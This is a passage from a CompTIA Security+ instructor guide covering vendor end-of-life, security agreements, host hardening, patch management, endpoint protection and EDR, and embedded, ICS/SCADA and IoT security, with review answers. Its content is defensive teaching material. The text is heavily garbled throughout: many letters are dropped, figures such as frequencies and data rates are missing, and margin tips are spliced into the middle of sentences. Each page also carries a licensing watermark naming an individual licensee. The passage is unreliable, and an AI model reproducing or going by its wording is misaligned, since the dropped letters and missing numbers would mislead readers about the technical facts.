Tip its developer or vendor. L products no longer receive security updates and so
Make sure students
represent a critical vulnerability if any remain in active use.
can contrast the or e ample, in Microsoft's support lifecycle policy, indows versions are given five
support available
years of mainstream support and five years of e tended support during which only
when a product is L
with L. security updates are shipped . ou can check the support status for a particular version
of indows at support.microsoft.com en us help windows lifecycle fact sheet.
Most and application vendors have similar policies. Care also needs to be taken
with open source software. If the software is well maintained, the development group
will identify versions that have Long Term upport LT . ther builds and version
branches might not receive updates.

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 323

It is also possible for both open source and commercial pro ects to be abandoned if a
company continues to rely on such abandonware, it will have to assume development
responsibility for it. There are many instances of applications and devices peripheral
devices especially that remain on sale with serious known vulnerabilities in firmware
or drivers and no prospect of vendor support for a fi . The problem is also noticeable
in consumer grade networking appliances and in the Internet of Things. hen
provisioning a supplier for applications and devices, it is vital to establish that they have
e ective security management lifecycles for their products.

r ani ational ecurit A reements Show Slide(s)

It is important to remember that although one can outsource virtually any service or rgani ational
activity to a third party, one cannot outsource legal accountability for these services ecurity Agreements
or actions. ou are ultimately responsible for the services and actions that these third
parties take. If they have any access to your data or systems, any security breach in their Teaching
organi ation for e ample, unauthori ed data sharing is e ectively a breach in yours. Tip
Issues of security risk awareness, shared duties, and contractual responsibilities can be e don't try to
set out in a formal legal agreement. The following types of agreements are common go into any detail
here ust make sure
• Memorandum of understanding (MOU) A preliminary or e ploratory agreement students know the
to e press an intent to work together. M s are usually intended to be relatively basic purpose of each
informal and not to act as binding contracts. M s almost always have clauses agreement type.
stating that the parties shall respect confidentiality, however.

• Business partnership agreement (BPA) hile there are many ways of

establishing business partnerships, the most common model in IT is the partner
agreements that large IT companies such as Microsoft and Cisco set up with
resellers and solution providers.

• Non disclosure agreement NDA Legal basis for protecting information assets.
NDAs are used between companies and employees, between companies and
contractors, and between two companies. If the employee or contractor breaks this
agreement and does share such information, they may face legal conse uences.
NDAs are useful because they deter employees and contractors from violating the
trust that an employer places in them.

• Service level agreement (SLA) A contractual agreement setting out the detailed
terms under which a service is provided.

• Measurement systems analysis (MSA) uality management processes, such as

i igma, make use of uantified analysis methods to determine the e ectiveness
of a system. This can be applied to cybersecurity procedures, such as vulnerability
and threat detection and response. A measurement systems analysis M A is a
means of evaluating the data collection and statistical methods used by a uality
management process to ensure they are robust. This might be an onboarding
re uirement when partnering with enterprise companies or government agencies.

A legal agreement is all very well, but it is still up to you to make sure that your
suppliers, vendors, and contractors can live up to it. If they can't, you may successfully
sue them, but if they go out of business, you are still accountable for their actions or
failures to act.

Conversely, you need to ensure that you can comply with the re uirements and
performance standards of any agreements that you enter into as a service provider.

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 324 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure Firmware
Answer the following uestions

1. What use is made of a TPM for NAC attestation?

The Trusted latform Module T M is a tamper proof at least in theory cryptographic

module embedded in the C or chipset. This can provide a means to sign the report
of the system configuration so that a network access control NAC policy enforcer can
trust it.

2. h are en orced file access controls not su cient in the e ent o the
loss or theft of a computer or mobile device?

The disk or other storage could be attached to a foreign system and the administrator
could take ownership of the files. ile level, full disk encryption D , or self encrypting
drives D mitigate this by re uiring the presence of the user's decryption key to read
the data.

3. What use is a TPM when implementing full disk encryption?

A trusted platform module provides a secure mechanism for creating and storing the
key used to encrypt the data. Access to the key is provided by configuring a password.
The alternative is usually to store the private key on a stick.

4. What countermeasures can you use against the threat of malicious

firm are code

nly use reputable suppliers for peripheral devices and strictly controlled sources for
firmware updates. Consider use of a sheep dip sandbo ed system to observe a device
before allowing it to be attached to a host in the enterprise network. se e ecution
control software to allow only approved vendors.

5. What type of interoperability agreement would be appropriate at the outset

of two companies agreeing to work with one another?

A memorandum of understanding M .

6. hat t pe o interopera ilit a reement is desi ned to ensure specific

performance standards?

A service level agreement LA . In addition, performance standards may also be

incorporated in business partner agreements As .

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 325

Topic 12B
Implement Endpoint Security

EXAM OBJECTIVES COVERED Teaching

3.2 Given a scenario, implement host or application security solutions Tip
This topic is
straightforward and
builds upon principles
ost hardware integrity is not of much use if the and applications software running
that are well
on it is weakly configured. As a security professional, you will often assist with drafting established by A , so
configuration baselines, ensuring hosts comply with those baselines, and implementing you should be able to
endpoint protection security agents. complete it uickly.

Hardening Show Slide(s)

The process of putting an operating system or application in a secure configuration ardening

is called hardening. hen hardening a system, it is important to keep in mind its
intended use, because hardening a system can also restrict the system's access and
capabilities. The need for hardening must be balanced against the access re uirements
and usability in a particular situation.
or an functioning in a given role, there will usually be a fairly standard series
of steps to follow to apply a secure configuration to allow the and applications
software to e ecute that role. Many of the re uirements can be applied automatically
via a configuration baseline template. The essential principle is of least functionality
that a system should run only the protocols and services re uired by legitimate users
and no more. This reduces the potential attack surface.
• Interfaces provide a connection to the network. ome machines may have more
than one interface. or e ample, there may be wired and wireless interfaces or a
modem interface. ome machines may come with a management network interface
card. If any of these interfaces are not re uired, they should be e plicitly disabled
rather than simply left unused.

• ervices provide a library of functions for di erent types of applications. ome

services support local features of the and installed applications. ther services
support remote connections from clients to server applications. nused services
should be disabled.

• Application service ports allow client software to connect to applications over a

network. These should either be disabled or blocked at a firewall if remote access
is not re uired. e aware that a server might be configured with a non standard
port. or e ample, an TT server might be configured to use rather than
. Conversely, malware may try to send non standard data over an open port. An
intrusion detection system should detect if network data does not correspond to
the e pected protocol format.

• ersistent storage holds user data generated by applications, plus cached

credentials. Disk encryption is essential to data security. elf encrypting drives can
be used so that all data at rest is always stored securely.

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 326 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products that
you are running.

Show Slide(s) aseline Confi uration and e istr ettin s

aseline Configuration
ou will have separate configuration baselines for desktop clients, file and print
and egistry ettings servers, Domain Name ystem DN servers, application servers, directory services
servers, and other types of systems. In indows, configuration settings are stored in
Teaching the registry. n a indows domain network, each domain oined computer will receive
Tip policy settings from one or more group policy ob ects s . These policy settings are
Note that Linu stores applied to the registry each time a computer boots. here hosts are centrally managed
all configuration and running only authori ed apps and services, there should be relatively little reason
settings in te t for security relevant registry values to change. ights to modify the registry should only
files. These can be issued to user and service accounts on a least privilege basis. A host based intrusion
be scanned for
detection system can be configured to alert suspicious registry events.
baseline compliance
access.redhat.com aseline deviation reporting means testing the actual configuration of hosts to ensure
documentation en us that their configuration settings match the baseline template. n indows networks,
red hat enterprise
linu html security
the Microsoft aseline ecurity Analy er M A tool was popularly used to validate
guide configuration the security configuration. M A and other Microsoft reporting tools have now been
compliance scanning replaced by the ecurity Compliance Toolkit docs.microsoft.com en us windows
scanning the system security threat protection security compliance toolkit .
for configuration
compliance and
vulnerabilities .

Using Security Compliance anager to compare settings in a production GPO with icrosoft s
template policy settings. (Screenshot used with permission from icrosoft.)

Show Slide(s) atch ana ement

atch Management
No operating system, software application, or firmware implementation is wholly free
from vulnerabilities. As soon as a vulnerability is identified, vendors will try to correct it.
At the same time, attackers will try to e ploit it. Automated vulnerability scanners can

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 327

be e ective at discovering missing patches for the operating system, plus a wide range Teaching
of third party software apps and devices firmware. canning is only useful if e ective Tip
procedures are in place to apply the missing patches, however. npatched client
n residential and small networks, hosts will be configured to auto update, meaning applications and web
application servers
that they check for and install patches automatically. The ma or and applications corrupting trusted
software products are well supported in terms of vendor supplied fi es for security websites through
issues. nterprise networks need to be cautious about this sort of automated the site owner's la
deployment, however, as a patch that is incompatible with an application or work ow security remain one
can cause availability issues. There can also be performance and management issues of the biggest security
issues at the current
when multiple applications run update clients on the same host. or e ample, as well
time uifa for
as the updater, there is likely to be a security software update, browser updater, instance, theregister.
Java updater, M driver updater, and so on. These issues can be mitigated by com
deploying an enterprise patch management suite. ome suites, such as Microsoft s missed patch caused
ystem Center Configuration Manager CCM ndpoint Manager docs.microsoft.com e uifa data breach .
en us mem configmgr , are vendor specific while others are designed to support third ecent years have
seen leaks of tools
party applications and multiple s.
developed by the CIA
It can also be difficult to schedule patch operations, especially if applying the patch and other intelligence
is an availability risk to a critical system. If vulnerability assessments are continually agencies to e ploit
vulnerabilities in
highlighting issues with missing patches, patch management procedures should indows and mobile
be upgraded. If the problem a ects certain hosts only, it could be an indicator of . This means that
compromise that should be investigated more closely. systems that are not
completely up to
atch management can also be difficult for legacy systems, proprietary systems, and date with patches are
systems from vendors without robust security management plans, such as some types e tremely high risk.
of Internet of Things devices. These systems will need compensating controls, or some
other form of risk mitigation if patches are not readily available.

Endpoint Protection Show Slide(s)

Another crucial step in hardening is to configure endpoint protection for automatic ndpoint rotection
detection and prevention of malware threats. There have been many iterations of
host based endpoint protection suites and agents. It is important to consider the Teaching
contrasting functions performed, as individual software tools or protection suites often Tip
combine multiple functionality. tudents should
hopefully be
Antivirus (A-V)/Anti-Malware comfortable with
the features and
The first generation of anti virus A software is characteri ed by signature based operation of A
detection and prevention of known viruses. An A product will now perform scanners, so focus on
generali ed malware detection, meaning not ust viruses and worms, but also Tro ans, advanced malware
spyware, s, crypto ackers, and so on. hile A software remains important, detection techni ues.
signature based detection is widely recogni ed as being insufficient for the prevention Note that we'll cover
of data breaches. DL in more detail
later in the course.
Host-Based Intrusion Detection/Prevention (HIDS/HIPS) Interaction
Opportunity
ost based intrusion detection systems ID provide threat detection via log and
file system monitoring. ID come in many di erent forms with di erent capabilities, ptionally, get the
some of them preventative I . ile system integrity monitoring uses signatures to students to research
features of s on
detect whether a managed file image such as an system file, driver, or application di erent vendor sites.
e ecutable has changed. roducts may also monitor ports and network interfaces,
and process data and logs generated by specific applications, such as TT or T .

Endpoint Protection Platform (EPP)

ndpoint protection usually depends on an agent running on the local host. If multiple
security products install multiple agents say one for A , one for ID , another for
host based firewall, and so on , they can impact system performance and cause

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 328 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

con icts, creating numerous technical support incidents and security incident false
positives. An endpoint protection platform is a single agent performing multiple
security tasks, including malware intrusion detection and prevention, but also other
security features, such as a host firewall, web content filtering secure search and
browsing, and file message encryption.

Data Loss Prevention (DLP)

Many s include a data loss prevention DL agent. This is configured with policies
to identify privileged files and strings that should be kept private or confidential, such
as credit card numbers. The agent enforces the policy to prevent data from being
copied or attached to a message without authori ation.

Endpoint Protection Deployment

hile specific products vary widely in terms of features and implementation detail,
some generic tasks to implement endpoint protection include
1. Configure the management system to push the agent software and any updates
to all desktops. This will re uire configuring permissions and firewall settings.

2. Assign hosts to appropriate groups for policy assignment. or e ample, client

endpoints have very di erent security re uirements to servers. hile it may be
appropriate to use a preventative mechanism immediately to isolate a client
when a threat is detected, automatically doing this for a critical server could
cascade to loss of functionality across the network.

3. Test the di erent host group configuration settings to ensure that the e pected
range of threats is detected.

4. se a monitoring dashboard to verify status across all network hosts. Apart from
detection events, if the agent is disabled or missing, there should be an alert.

Show Slide(s) e t eneration ndpoint rotection

Ne t eneration
here provides mostly signature based detection and prevention, ne t generation
ndpoint rotection endpoint protection with automated response is focused on logging of endpoint
observables and indicators combined with behavioral and anomaly based analysis.
Teaching
Tip Endpoint Detection and Response (EDR)
Note these platforms
An endpoint detection and response (EDR) product's aim is not to prevent initial
are distinguished by
the use of AI machine e ecution, but to provide real time and historical visibility into the compromise, contain
learning analytics. the malware within a single host, and facilitate remediation of the host to its original
state. The term D was coined by artner security researcher Anton Chuvakin, and
artner produces annual Magic uadrant reports for both gartner.com en
documents and D functionality within security suites gartner.com en
documents market guide for endpoint detection and response solutio .
here earlier endpoint protection suites report to an on premises management
server, ne t generation endpoint agents are more likely to be managed from a cloud
portal and use artificial intelligence AI and machine learning to perform user and
entity behavior analysis. These analysis resources would be part of the security service
provider's o ering.

ote that managed detection and response ( ) is a class of hosted security service
(digitalguardian.com blog what-managed-detection-and-response-definition-benefits-how-
choose-vendor-and-more).

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 329

e t eneration ire all Inte ration

An analytics driven ne t gen antivirus product is likely to combine with the perimeter
and onal security o ered by ne t gen firewalls. or e ample, detecting a threat on an
endpoint could automate a firewall policy to block the covert channel at the perimeter,
isolate the endpoint, and mitigate risks of the malware using lateral movement
between hosts. This type of functionality is set out in more detail in ophos's white
paper on synchroni ed security sophos.com en us lp synchroni ed security.asp .

Antivirus Response Show Slide(s)

An on access anti virus scanner or intrusion prevention system works by identifying Antivirus esponse
when processes or scripts are e ecuted and intercepting or hooking the call to scan
the code first. If the code matches a signature of known malware or e hibits malware
like behavior that matches a heuristic profile, the scanner will prevent e ecution and
attempt to take the configured action on the host file clean, uarantine, erase, and so
on . An alert will be displayed to the user and the action will be logged and also may
generate an administrative alert . The malware will normally be tagged using a vendor
proprietary string and possibly by a CM Common Malware numeration identifier.
These identifiers can be used to research the symptoms of and methods used by
the malware. This may help to confirm the system is fully remediated and to identify
whether other systems have been infected. It is also important to trace the source of
the infection and ensure that it is blocked to prevent repeat attacks and outbreaks.

Advanced Malware Tools

Malware is often able to evade detection by automated scanners. Analysis of I M and
intrusion detection logs might reveal suspicious network connections, or a user may
observe une plained activity or behavior on a host. hen you identify symptoms such
as these, but the A scanner or agent does not report an infection, you will need to
analy e the host for malware using advanced tools.
There is a plethora of advanced analysis and detection utilities, but the starting point
for most technicians is ysinternals docs.microsoft.com en us sysinternals .

and o in
andbo ing is a techni ue that isolates an untrusted host or app in a segregated
environment to conduct tests. andbo environments intentionally limit interfaces with
the host environment. The analysis of files sent to a sandbo can include determining
whether the file is malicious, how it might have a ected certain systems if run outside
of the sandbo , and what dependencies it might have with e ternal files and hosts.
andbo es o er more than traditional anti malware solutions because you can apply
a variety of di erent environments to the sandbo instead of ust relying on how the
malware might e ist in your current configuration.

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 330 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Endpoint Security
Answer the following uestions

1. hat is a hardened confi uration

A basic principle of security is to run only services that are needed. A hardened
system is configured to perform a role as client or application server with the minimal
possible attack surface, in terms of interfaces, ports, services, storage, system registry
permissions, lack of security controls, and vulnerabilities.

2. True or false? Only Microsoft's operating systems and applications require

security patches.

alse any vendor's or open source software or firmware can contain vulnerabilities
that need patching.

3. Anti-virus software has reported the presence of malware but cannot

remo e it automaticall Apart rom the location o the a ected file hat
information will you need to remediate the system manually?

The string identifying the malware. ou can use this to reference the malware on the
A vendor's site and, hopefully, obtain manual removal and prevention advice.

4. You are consulting with a medium-size company about endpoint security

solutions. What advantages does a cloud-based analytics platform have
over an on-premises solution that relies on signature updates?

Advanced persistent threat A T malware can use many techni ues to evade
signature based detection. A cloud analytics platform, backed by machine learning, can
apply more e ective behavioral based monitoring and alerting.

5. I ou suspect a process o ein used or data e filtration ut the process is

not identified as mal are A so t are hat t pes o anal sis tools ill
be most useful?

ou can use a sandbo with monitoring tools to see which files the process interacts
with and a network monitor to see if it opens or tries to open a connection with a
remote host.

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 331

Topic 12C
Explain Embedded System
Security Implications

EXAM OBJECTIVES COVERED Teaching

.6 Explain the security implications of embedded and specialized systems Tip
This lesson on
host security
As well as the obvious computing hosts within your networks, you must also account concludes with a
look at embedded
for the security of embedded systems. mbedded computing functionality can be systems. The risks
found in consumer electronics devices and in specialist monitoring and control from these systems
systems, so it is important that you know how to identify and secure these devices. are increasingly
well known and
Embedded Systems documented, so this is
an important topic to
An embedded system is a complete computer system that is designed to perform a cover.
specific, dedicated function. These systems can be as contained as a microcontroller Show Slide(s)
in an intravenous drip rate meter or as large and comple as the network of control
devices managing a water treatment plant. mbedded systems can be characteri ed
as static environments. A C is a dynamic environment. The user can add or remove mbedded ystems
programs and data files, install new hardware components, and upgrade the operating
Teaching
system. A static environment does not allow or re uire such fre uent changes.
Tip
In terms of security this can be ideal, because unchanging environments are typically Distinguish embedded
easier to protect and defend. tatic computing environments pose their own risks, systems from general
however. A static environment is often a black bo to security administrators. nlike purpose C hosts
an environment such as indows, there may be little support for identifying and in terms of single
purpose functions and
correcting security issues.
resource constraints.

Cost o er and Compute Constraints

mbedded systems are usually constrained in terms of processor capability cores and
speed , system memory, and persistent storage. Cost is an important factor. As devices
may be used in large numbers and are designed for fairly predictable processing
workloads, there is no obvious reason to over provision compute resources and the
price per unit can be driven as low as possible.
The other factor determining compute resources is power. Many embedded devices
are battery powered, and may need to run for years without having to replace the cells.
This means that processing must be kept to the minimum possible level.

Cr pto Authentication and Implied Trust Constraints

The lack of compute resources means that embedded systems are not well matched
to the cryptographic identification and authentication technologies that are widely
used on computer networks. As embedded systems become more accessible via
those networks, however, they need to use cryptoprocessors to ensure confidentiality,
integrity, and availability. This is prompting the development of ciphers that do not
re uire such large processing resources.
n C hardware, a root of trust is established at the hardware level by a T M.
ithout this e plicit trust anchor, a network has to use an implied trust model.

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 332 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Implied trust means that every device that has been added to the network is trusted,
on the assumption that it was added and continues to be operated by a legitimate
administrator. ntil there is widespread adoption of embedded T M, embedded
networks have to rely on the perimeter security model.

Network and Range Constraints

Minimi ing compute functions also has an impact on choices for network connectivity.
The i i and standards developed for use with computer and smartphone
networking use power hungry antennas to ma imi e data rates and range, plus
processing to encrypt the communications. Networks for embedded systems
emphasi e power efficient transfer of small amounts of data with a high degree of
reliability and low latency.

Show Slide(s) Logic Controllers for Embedded Systems

Logic Controllers for
mbedded systems are normally based on firmware running on a programmable
mbedded ystems logic controller (PLC). These LCs are built from di erent hardware and
components than some desktop Cs.
Teaching
Tip System on Chip (SoC)
plain the way that
Desktop computer system architecture uses a generali ed C plus various other
embedded systems
are same, but processors and controllers and system memory, linked via the motherboard. System
di erent compared to on chip (SoC) is a design where all these processors, controllers, and devices are
Cs. The functions for provided on a single processor die or chip . This type of packaging saves space and is
C , memory, storage, usually power efficient, and so is very commonly used with embedded systems.
and networking are
still there, but the Raspberry Pi raspberrypi.org and Arduino arduino.cc are e amples of oC boards,
re uirements are initially devised as educational tools, but now widely used for industrial applications,
di erent availability, and hacking.
predictability, and cost
are prioriti ed over
e ibility .
ield ro ramma le ate Arra A
A microcontroller is a processing unit that can perform se uential operations from
a dedicated instruction set. The instruction set is determined by the vendor at the
time of manufacture. oftware running on the microcontroller has to be converted
to these instructions assembly language . As many embedded systems perform
relatively simple but repetitive operations, it can be more efficient to design the
hardware controller to perform only the instructions needed. ne e ample of this
is the application specific integrated circuits A ICs used in thernet switches. A ICs
are e pensive to design, however, and work only for a single application, such as
thernet switching.
A field pro ramma le ate arra A is a type of controller that solves this
problem. The structure of the controller is not fully set at the time of manufacture.
The end customer can configure the programming logic of the device to run a
specific application.

Real-Time Operating Systems (RTOS)

Many embedded systems operate devices that perform acutely time sensitive tasks,
such as drip meters or ow valves. The kernels or operating systems that run these
devices must be much more stable and reliable than the that runs a desktop
computer or server. mbedded systems typically cannot tolerate reboots or crashes
and must have response times that are predictable to within microsecond tolerances.
Conse uently, these systems often use di erently engineered platforms called real-
time operating systems (RTOS). An T should be designed to have as small an
attack surface as possible. An T is still susceptible to C s and e ploits, however.

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 333

m edded stems Communications Considerations Show Slide(s)

istorically, embedded systems used proprietary vendor communications mbedded ystems

technologies. As technologies improve and closer integration with IT networks Communications
becomes more important, greater use of standardi ed communication technologies is Considerations
becoming more prevalent.
Teaching
Operational Technology (OT) Networks Tip
Consider mentioning
A cabled network for industrial applications is referred to as an operational technology . ah i i
T network. These typically use either serial data protocols or industrial thernet. aLow . It uses the
Industrial thernet is optimi ed for real time, deterministic transfers. uch networks M band for
might use vendor developed data link and networking protocols, as well as specialist better range at lower
power.
application protocols.

Cellular Networks
A cellular network enables long distance communication over the same system that
supports mobile and smartphones. This is also called baseband radio, after the
baseband processor that performs the function of a cellular modem. There are several
baseband radio technologies
• Narrowband IoT N IoT this refers to a low power version of the Long Term
volution LT or cellular standard. The signal occupies less bandwidth than
regular cellular. This means that data rates are limited kbps , but most
sensors need to send small packets with low latency, rather than making large data
transfers. Narrowband also has greater penetrating power, making it more suitable
for use in inaccessible locations, such as tunnels or deep within buildings, where
ordinary cellular connectivity would be impossible.

• LT Machine Type Communication LT M this is another low power system, but

supports higher bandwidth up to about Mbps .

hile not yet completely standardi ed, both N IoT and LT M are designed to be
compatible with networks. This means they do not interfere with signaling and
can use tower relays developed for . They may support higher data rates, though
latency and reliability tend to be more important considerations.
Any LT based cellular radio uses a subscriber identity module (SIM) card as an
identifier. The IM is issued by a cellular provider, with roaming to allow use of other
suppliers' tower relays. As a removable card is not really a suitable form factor for
embedded, an e IM incorporates the same function as a chip on the system board or
oC design.
ncryption of frames between the endpoint and the cell tower and within the backhaul
to Internet routers is the responsibility of the network operator. ver the air encryption
is performed by encryption schemes devised by the cellular standards body .
ackhaul security is usually enforced using I ec. The embedded system can use
application layer encryption for additional security.

Z-Wave and Zigbee

ave and igbee are wireless communications protocols used primarily for home
automation. oth create a mesh network topology, using low energy radio waves to
communicate from one appliance to another. In Z-Wave, devices can be configured to
work as repeaters to e tend the network but there is a limit of four hops between a
controller device and an endpoint. ave uses Mh fre uencies.
Zigbee has similar uses to ave and is an open source competitor technology to it.
The igbee Alliance operates certification programs for its various technologies and
standards. igbee uses the . fre uency band. This higher fre uency allows more

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 334 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

data bandwidth at the e pense of range compared to ave and the greater risk of
interference from other . radio communications. igbee supports more overall
devices within a single network and there is no hop limit for communication between
devices.
oth ave and igbee have communications encryption. The main threats are from
re pairing attacks and from rogue devices. A re pairing attack allows a threat actor
to discover the network key by forcing a device o the network, causing it to try to
re connect checkpoint.com press the dark side of smart lighting check point
research shows how business and home networks can be hacked from a lightbulb . If
the user connects a rogue device to the network, the system depends on application
level security to prevent the device from compromising higher value targets, such as a
smart hub, alarm, or door entry mechanism.

Show Slide(s) Industrial Control Systems

Industrial Control
Industrial systems have di erent priorities to IT systems. ften, ha ardous
ystems electromechanical components are involved, so safety is the overriding priority.
Industrial processes also prioriti e availability and integrity over confidentiality
Teaching reversing the CIA triad as the AIC triad.
Tip
plain the main
or o and rocess Automation stems
components in IC
CADA then discuss Industrial control systems (ICSs) provide mechanisms for work ow and process
some general risks for automation. These systems control machinery used in critical infrastructure, like
each industry sector. power suppliers, water suppliers, health services, telecommunications, and national
emind students security services. An IC that manages process automation within a single site is usually
that they can visit the referred to as a distributed control system DC .
sector specific I ACs
for more information. An IC comprises plant devices and e uipment with embedded LCs. The LCs are
linked either by an T fieldbus serial network or by industrial thernet to actuators
that operate valves, motors, circuit breakers, and other mechanical components, plus
sensors that monitor some local state, such as temperature. utput and configuration
of a LC is performed by one or more human-machine interfaces (HMIs). An MI
might be a local control panel or software running on a computing host. LCs are
connected within a control loop, and the whole process automation system can be
governed by a control server. Another important concept is the data historian, which
is a database of all the information generated by the control loop.

Supervisory Control and Data Acquisition (SCADA)

A supervisory control and data acquisition (SCADA) system takes the place of
a control server in large scale, multiple site IC s. CADA typically run as software
on ordinary computers, gathering data from and managing plant devices and
e uipment with embedded LCs, referred to as field devices. CADA typically use AN
communications, such as cellular or satellite, to link the CADA server to field devices.

ICS/SCADA Applications
These types of systems are used within many sectors of industry
• nergy refers to power generation and distribution. More widely, utilities includes
water sewage and transportation networks.

• Industrial can refer specifically to the process of mining and refining raw materials,
involving ha ardous high heat and pressure furnaces, presses, centrifuges, pumps,
and so on.

• abrication and manufacturing refer to creating components and assembling

them into products. mbedded systems are used to control automated production

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 335

systems, such as forges, mills, and assembly lines. These systems must work to
e tremely high precisions.

• Logistics refers to moving things from where they were made or assembled to
where they need to be, either within a factory or for distribution to customers.
mbedded technology is used in control of automated transport and lift systems
plus sensors for component tracking.

• acilities refers to site and building management systems, typically operating

automated heating, ventilation, and air conditioning AC , lighting, and security
systems.

IC CADA was historically built without regard to IT security, though there is now high
awareness of the necessity of enforcing security controls to protect them, especially
when they operate in a networked environment.

One infamous example of an attack on an embedded system is the Stuxnet worm (wired.
com 01 11 countdown-to-zero-day-stuxnet). This was designed to attack the SCA A
management software running on indows PCs to damage the centrifuges used by Iran s
nuclear fuels program. IST Special Publication 00- covers some recommendations
for implementing security controls for ICS and SCA A (nvlpubs.nist.gov nistpubs
SpecialPublications IST.SP. 00- r .pdf).

Internet of Things Show Slide(s)

The term Internet of Things (IoT) is used to describe a global network of appliances Internet of Things
and personal devices that have been e uipped with sensors, software, and network
connectivity. This compute functionality allows these ob ects to communicate and Teaching
pass data between themselves and other traditional systems like computer servers. Tip
This is often referred to as Machine to Machine M M communication. ach thing is ith Internet of
identified with some form of uni ue serial number or code embedded within its own Things and wearable
operating or control system and is able to inter operate within the e isting Internet technology, evaluation
infrastructure either directly or via an intermediary. An IoT network will generally use of the supply chain
the following types of components is critical. endors
and Ms must be
• ub control system IoT devices usually re uire a communications hub to facilitate assessed for their
ave or igbee networking. There must also be a control system, as most IoT security awareness.
devices are headless, meaning they have no user control interface. This could be a
smart hub, with voice control, or a smartphone C app.

• mart devices IoT endpoints implement the function, such as a smart lightbulb
or a video entryphone that you can operate remotely. These devices implement
compute, storage, and network functions that are all potentially vulnerable to
e ploits. Most smart devices use a Linu or Android kernel. ecause they're
e ectively running mini computers, smart devices are vulnerable to some of
the standard attacks associated with web applications and network functions.
Integrated peripherals such as cameras or microphones could be compromised to
facilitate surveillance.

• earables some IoT devices are designed as personal accessories, such as

smart watches, bracelets and pendant fitness monitors, and eyeglasses. Current
competing technologies are based on it it, Android ear , amsung's Ti en ,
and Apple i , each with their own separate app ecosystems.

• ensors IoT devices need to measure all kinds of things, including temperature,
light levels, humidity, pressure, pro imity, motion, gas chemicals smoke, heart
breathing rates, and so on. These are implemented as thermocouples thermistors,
infrared detectors, inductive, photoelectric, and capacitative cells, accelerometers,
gyroscopes, and more.

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 336 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ome automation products often use vendor specific software and networking
protocols. As with embedded devices, security features can be poorly documented, and
patch management security response processes of vendors can be inade uate. hen
they are designed for residential use, IoT devices can su er from weak defaults. They
may be configured to work with a minimum of configuration e ort. There may be
recommended steps to secure the device that the customer never takes.

Show Slide(s) Specialized Systems for Facility Automation

peciali ed ystems
A speciali ed system refers to the use of embedded systems and or IoT devices for a
for acility Automation specific purpose or application.

uildin Automation stem A

A building automation system (BAS) for offices and data centers smart buildings
can include physical access control systems, but also heating, ventilation, and air
conditioning AC , fire control, power and lighting, and elevators and escalators.
These subsystems are implemented by LCs and various types of sensors that
measure temperature, air pressure, humidity, room occupancy, and so on. ome
typical vulnerabilities that a ect these systems include
• rocess and memory vulnerabilities, such as bu er over ow, in the LCs. These may
arise from processing maliciously crafted packets in the automation management
protocol. uilding automation uses dedicated network protocols, such as ACnet or
Dynet.

• se of plainte t credentials or cryptographic keys within application code.

• Code in ection via the graphical web application interfaces used to configure and
monitor systems. This can be used to perform Java cript based attacks, such as
click acking and cross site scripting .

It is possible that control of these systems could be used to perform some sort of
Do or ransom demand consider disrupting AC controls within a data center, for
instance . owever, as with the Target data breach, the aim is likely to access the
corporate data network from the automation and monitoring system, which may be
accessible via a supplier company krebsonsecurity.com tag fa io mechanical .

Smart Meters
A smart meter provides continually updating reports of electricity, gas, or water usage
to the supplier, reducing the need for manual inspections. Most meters use cellular
data for communication back to the supplier, and an IoT protocol, such as ig ee, for
integration with smart appliances.

Surveillance Systems
A physical access control system AC is a network of monitored locks, intruder
alarms, and video surveillance. A AC can either be implemented as part of a building
automation system or a separate system in its own right. aining physical access to
premises, or even ust access to video monitoring systems, gives an adversary many
opportunities to develop additional attacks. As with building automation, a AC is likely to
be installed and maintained by an e ternal supplier. This can lead to it being omitted from
risk and vulnerability assessments, as highlighted by the overnment Accountability
